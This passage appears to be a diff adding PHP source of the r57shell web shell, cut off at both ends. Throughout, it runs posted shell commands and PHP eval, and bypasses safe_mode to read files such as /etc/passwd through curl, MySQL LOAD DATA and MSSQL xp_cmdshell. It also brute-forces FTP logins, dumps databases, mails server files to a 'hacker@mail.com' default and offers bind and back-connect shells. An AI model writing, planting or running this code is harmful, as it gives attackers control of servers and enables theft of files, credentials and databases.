@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! koneksi ke MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! tidak bisa koek ke SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Tidak bisa memilih database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Tidak bisa dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("show tables;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select 